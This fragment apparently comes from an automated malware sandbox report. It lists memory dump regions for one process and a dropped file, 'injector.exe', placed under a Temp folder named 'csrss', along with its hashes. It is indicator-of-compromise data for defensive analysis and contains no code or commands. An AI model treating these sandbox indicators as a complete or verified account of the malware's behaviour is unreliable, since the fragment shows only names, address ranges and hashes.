memory/5084-20-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-19-0x0000000005200000-0x0000000005700000-memory.dmp

memory/5084-21-0x0000000000400000-0x00000000030F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/5084-27-0x0000000005200000-0x0000000005700000-memory.dmp

memory/5084-28-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-29-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-30-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-31-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-32-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-33-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-34-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-35-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-36-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-37-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-38-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-39-0x0000000000400000-0x00000000030F3000-memory.dmp

memory/5084-40-0x0000000000400000-0x00000000030F3000-memory.dmp